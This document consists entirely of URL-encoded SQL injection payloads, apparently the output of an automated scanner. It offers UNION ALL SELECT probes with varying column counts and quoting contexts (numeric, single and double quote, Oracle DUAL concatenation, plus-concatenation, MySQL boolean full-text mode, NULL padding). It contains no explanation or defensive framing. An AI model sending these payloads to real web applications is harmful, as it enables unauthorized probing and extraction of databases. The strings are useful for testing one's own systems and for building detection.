-8312%29%20WHERE%205269%3D5269%20UNION%20ALL%20SELECT%205269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269--%20 -2755%29%20WHERE%203949%3D3949%20UNION%20ALL%20SELECT%203949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949--%20 -6633%29%20WHERE%203523%3D3523%20UNION%20ALL%20SELECT%203523%2C3523%2C3523%2C3523%2C3523%2C3523%2C3523%2C3523%2C3523%2C3523%2C3523%2C3523%2C3523%2C3523%2C3523%2C3523--%20 -3182%29%20WHERE%204654%3D4654%20UNION%20ALL%20SELECT%204654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654--%20 -8707%29%20WHERE%202872%3D2872%20UNION%20ALL%20SELECT%202872%2C2872%2C2872%2C2872%2C2872%2C2872%2C2872%2C2872%2C2872%2C2872%2C2872%2C2872%2C2872%2C2872%2C2872%2C2872%2C2872%2C2872--%20 -7509%29%20WHERE%202230%3D2230%20UNION%20ALL%20SELECT%202230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230--%20 -2024%29%20WHERE%207531%3D7531%20UNION%20ALL%20SELECT%207531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531--%20 -1776%27%20WHERE%202691%3D2691%20UNION%20ALL%20SELECT%202691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691--%20 -9434%27%20WHERE%209537%3D9537%20UNION%20ALL%20SELECT%209537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537--%20 -8046%27%20WHERE%207693%3D7693%20UNION%20ALL%20SELECT%207693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693--%20 -3838%27%20WHERE%203583%3D3583%20UNION%20ALL%20SELECT%203583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583--%20 -9628%27%20WHERE%201973%3D1973%20UNION%20ALL%20SELECT%201973%2C1973%2C1973%2C1973%2C1973%2C1973%2C1973%2C1973%2C1973%2C1973%2C1973%2C1973%2C1973%2C1973%2C1973--%20 -2896%27%20WHERE%203170%3D3170%20UNION%20ALL%20SELECT%203170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170--%20 -7796%27%20WHERE%209168%3D9168%20UNION%20ALL%20SELECT%209168%2C9168%2C9168%2C9168%2C9168%2C9168%2C9168%2C9168%2C9168%2C9168%2C9168%2C9168%2C9168%2C9168%2C9168%2C9168%2C9168--%20 -7696%27%20WHERE%202488%3D2488%20UNION%20ALL%20SELECT%202488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488--%20 -7383%27%20WHERE%201538%3D1538%20UNION%20ALL%20SELECT%201538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538%2C1538--%20 -1419%27%20WHERE%203646%3D3646%20UNION%20ALL%20SELECT%203646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646--%20 -5916%22%20WHERE%209180%3D9180%20UNION%20ALL%20SELECT%209180%2C9180%2C9180%2C9180%2C9180%2C9180%2C9180%2C9180%2C9180%2C9180%2C9180--%20 -5657%22%20WHERE%207392%3D7392%20UNION%20ALL%20SELECT%207392%2C7392%2C7392%2C7392%2C7392%2C7392%2C7392%2C7392%2C7392%2C7392%2C7392%2C7392--%20 -7223%22%20WHERE%201499%3D1499%20UNION%20ALL%20SELECT%201499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499--%20 -7035%22%20WHERE%206698%3D6698%20UNION%20ALL%20SELECT%206698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698--%20 -9172%22%20WHERE%205274%3D5274%20UNION%20ALL%20SELECT%205274%2C5274%2C5274%2C5274%2C5274%2C5274%2C5274%2C5274%2C5274%2C5274%2C5274%2C5274%2C5274%2C5274%2C5274--%20 -4148%22%20WHERE%204897%3D4897%20UNION%20ALL%20SELECT%204897%2C4897%2C4897%2C4897%2C4897%2C4897%2C4897%2C4897%2C4897%2C4897%2C4897%2C4897%2C4897%2C4897%2C4897%2C4897--%20 -7551%22%20WHERE%207572%3D7572%20UNION%20ALL%20SELECT%207572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572--%20 -2785%22%20WHERE%204277%3D4277%20UNION%20ALL%20SELECT%204277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277--%20 -7633%22%20WHERE%204853%3D4853%20UNION%20ALL%20SELECT%204853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853--%20 -4164%22%20WHERE%205385%3D5385%20UNION%20ALL%20SELECT%205385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385--%20 -7771%20WHERE%203431%3D3431%20UNION%20ALL%20SELECT%203431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431--%20 -8266%20WHERE%201631%3D1631%20UNION%20ALL%20SELECT%201631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631--%20 -7044%20WHERE%207035%3D7035%20UNION%20ALL%20SELECT%207035%2C7035%2C7035%2C7035%2C7035%2C7035%2C7035%2C7035%2C7035%2C7035%2C7035%2C7035%2C7035--%20 -5983%20WHERE%204460%3D4460%20UNION%20ALL%20SELECT%204460%2C4460%2C4460%2C4460%2C4460%2C4460%2C4460%2C4460%2C4460%2C4460%2C4460%2C4460%2C4460%2C4460--%20 -7064%20WHERE%203156%3D3156%20UNION%20ALL%20SELECT%203156%2C3156%2C3156%2C3156%2C3156%2C3156%2C3156%2C3156%2C3156%2C3156%2C3156%2C3156%2C3156%2C3156%2C3156--%20 -2575%20WHERE%204923%3D4923%20UNION%20ALL%20SELECT%204923%2C4923%2C4923%2C4923%2C4923%2C4923%2C4923%2C4923%2C4923%2C4923%2C4923%2C4923%2C4923%2C4923%2C4923%2C4923--%20 -4504%20WHERE%206680%3D6680%20UNION%20ALL%20SELECT%206680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680--%20 -3529%20WHERE%207685%3D7685%20UNION%20ALL%20SELECT%207685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685--%20 -5688%20WHERE%205786%3D5786%20UNION%20ALL%20SELECT%205786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786%2C5786--%20 -7958%20WHERE%201958%3D1958%20UNION%20ALL%20SELECT%201958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958--%20 -4452%27%7C%7C%28SELECT%20%27nPWP%27%20FROM%20DUAL%20WHERE%204568%3D4568%20UNION%20ALL%20SELECT%204568%2C4568%2C4568%2C4568%2C4568%2C4568%2C4568%2C4568%2C4568%2C4568%2C4568--%20 -1769%27%7C%7C%28SELECT%20%27xebC%27%20FROM%20DUAL%20WHERE%202215%3D2215%20UNION%20ALL%20SELECT%202215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215--%20 -2710%27%7C%7C%28SELECT%20%27INGw%27%20FROM%20DUAL%20WHERE%205808%3D5808%20UNION%20ALL%20SELECT%205808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808%2C5808--%20 -6231%27%7C%7C%28SELECT%20%27WUrM%27%20FROM%20DUAL%20WHERE%205925%3D5925%20UNION%20ALL%20SELECT%205925%2C5925%2C5925%2C5925%2C5925%2C5925%2C5925%2C5925%2C5925%2C5925%2C5925%2C5925%2C5925%2C5925--%20 -2062%27%7C%7C%28SELECT%20%27ZnjP%27%20FROM%20DUAL%20WHERE%207161%3D7161%20UNION%20ALL%20SELECT%207161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161--%20 -7248%27%7C%7C%28SELECT%20%27ExAO%27%20FROM%20DUAL%20WHERE%207625%3D7625%20UNION%20ALL%20SELECT%207625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625--%20 -9055%27%7C%7C%28SELECT%20%27KQgs%27%20FROM%20DUAL%20WHERE%202088%3D2088%20UNION%20ALL%20SELECT%202088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088--%20 -8025%27%7C%7C%28SELECT%20%27cbhO%27%20FROM%20DUAL%20WHERE%201698%3D1698%20UNION%20ALL%20SELECT%201698%2C1698%2C1698%2C1698%2C1698%2C1698%2C1698%2C1698%2C1698%2C1698%2C1698%2C1698%2C1698%2C1698%2C1698%2C1698%2C1698%2C1698--%20 -9571%27%7C%7C%28SELECT%20%27IDye%27%20FROM%20DUAL%20WHERE%209796%3D9796%20UNION%20ALL%20SELECT%209796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796--%20 -5395%27%7C%7C%28SELECT%20%27BQCn%27%20FROM%20DUAL%20WHERE%201084%3D1084%20UNION%20ALL%20SELECT%201084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084--%20 -1730%27%7C%7C%28SELECT%20%27MmLn%27%20WHERE%201182%3D1182%20UNION%20ALL%20SELECT%201182%2C1182%2C1182%2C1182%2C1182%2C1182%2C1182%2C1182%2C1182%2C1182%2C1182--%20 -4598%27%7C%7C%28SELECT%20%27KjNa%27%20WHERE%204758%3D4758%20UNION%20ALL%20SELECT%204758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758--%20 -4840%27%7C%7C%28SELECT%20%27olKS%27%20WHERE%209136%3D9136%20UNION%20ALL%20SELECT%209136%2C9136%2C9136%2C9136%2C9136%2C9136%2C9136%2C9136%2C9136%2C9136%2C9136%2C9136%2C9136--%20 -5716%27%7C%7C%28SELECT%20%27oqWQ%27%20WHERE%203668%3D3668%20UNION%20ALL%20SELECT%203668%2C3668%2C3668%2C3668%2C3668%2C3668%2C3668%2C3668%2C3668%2C3668%2C3668%2C3668%2C3668%2C3668--%20 -6836%27%7C%7C%28SELECT%20%27omwV%27%20WHERE%202640%3D2640%20UNION%20ALL%20SELECT%202640%2C2640%2C2640%2C2640%2C2640%2C2640%2C2640%2C2640%2C2640%2C2640%2C2640%2C2640%2C2640%2C2640%2C2640--%20 -8094%27%7C%7C%28SELECT%20%27XBuW%27%20WHERE%205287%3D5287%20UNION%20ALL%20SELECT%205287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287--%20 -4925%27%7C%7C%28SELECT%20%27Gxtr%27%20WHERE%206573%3D6573%20UNION%20ALL%20SELECT%206573%2C6573%2C6573%2C6573%2C6573%2C6573%2C6573%2C6573%2C6573%2C6573%2C6573%2C6573%2C6573%2C6573%2C6573%2C6573%2C6573--%20 -6179%27%7C%7C%28SELECT%20%27IWhb%27%20WHERE%208469%3D8469%20UNION%20ALL%20SELECT%208469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469--%20 -9010%27%7C%7C%28SELECT%20%27AnMr%27%20WHERE%209388%3D9388%20UNION%20ALL%20SELECT%209388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388%2C9388--%20 -6916%27%7C%7C%28SELECT%20%27erBe%27%20WHERE%208214%3D8214%20UNION%20ALL%20SELECT%208214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214--%20 -3585%27%2B%28SELECT%20EFsB%20WHERE%209877%3D9877%20UNION%20ALL%20SELECT%209877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877--%20 -3217%27%2B%28SELECT%20qnRE%20WHERE%205096%3D5096%20UNION%20ALL%20SELECT%205096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096--%20 -6858%27%2B%28SELECT%20tZhs%20WHERE%204543%3D4543%20UNION%20ALL%20SELECT%204543%2C4543%2C4543%2C4543%2C4543%2C4543%2C4543%2C4543%2C4543%2C4543%2C4543%2C4543%2C4543--%20 -4029%27%2B%28SELECT%20NyHE%20WHERE%202711%3D2711%20UNION%20ALL%20SELECT%202711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711--%20 -7496%27%2B%28SELECT%20PBic%20WHERE%203281%3D3281%20UNION%20ALL%20SELECT%203281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281%2C3281--%20 -2231%27%2B%28SELECT%20tpTl%20WHERE%202849%3D2849%20UNION%20ALL%20SELECT%202849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849%2C2849--%20 -5728%27%2B%28SELECT%20MVlV%20WHERE%208698%3D8698%20UNION%20ALL%20SELECT%208698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698--%20 -8834%27%2B%28SELECT%20orIh%20WHERE%208836%3D8836%20UNION%20ALL%20SELECT%208836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836--%20 -5297%27%2B%28SELECT%20xzSe%20WHERE%202594%3D2594%20UNION%20ALL%20SELECT%202594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594--%20 -6526%27%2B%28SELECT%20ldEb%20WHERE%201031%3D1031%20UNION%20ALL%20SELECT%201031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031--%20 -9083%27%2B%28SELECT%20%27pJyb%27%20WHERE%202261%3D2261%20UNION%20ALL%20SELECT%202261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261--%20 -8212%27%2B%28SELECT%20%27mlsf%27%20WHERE%209277%3D9277%20UNION%20ALL%20SELECT%209277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277--%20 -1782%27%2B%28SELECT%20%27HXcq%27%20WHERE%204276%3D4276%20UNION%20ALL%20SELECT%204276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276--%20 -9546%27%2B%28SELECT%20%27mkCU%27%20WHERE%203455%3D3455%20UNION%20ALL%20SELECT%203455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455%2C3455--%20 -7802%27%2B%28SELECT%20%27DiWn%27%20WHERE%209230%3D9230%20UNION%20ALL%20SELECT%209230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230--%20 -3962%27%2B%28SELECT%20%27wpJu%27%20WHERE%201801%3D1801%20UNION%20ALL%20SELECT%201801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801--%20 -3365%27%2B%28SELECT%20%27JgPb%27%20WHERE%203467%3D3467%20UNION%20ALL%20SELECT%203467%2C3467%2C3467%2C3467%2C3467%2C3467%2C3467%2C3467%2C3467%2C3467%2C3467%2C3467%2C3467%2C3467%2C3467%2C3467%2C3467--%20 -4025%27%2B%28SELECT%20%27ZTeE%27%20WHERE%208382%3D8382%20UNION%20ALL%20SELECT%208382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382--%20 -5090%27%2B%28SELECT%20%27Ewnp%27%20WHERE%209681%3D9681%20UNION%20ALL%20SELECT%209681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681%2C9681--%20 -1459%27%2B%28SELECT%20%27mVgw%27%20WHERE%202060%3D2060%20UNION%20ALL%20SELECT%202060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060--%20 -6575%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653--%20 -7804%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226--%20 -4544%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283--%20 -8609%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389--%20 -2930%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955--%20 -7986%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204481%2C4481%2C4481%2C4481%2C4481%2C4481%2C4481%2C4481%2C4481%2C4481%2C4481%2C4481%2C4481%2C4481%2C4481%2C4481--%20 -5830%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386--%20 -7497%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387--%20 -7667%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845%2C1845--%20 -2558%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 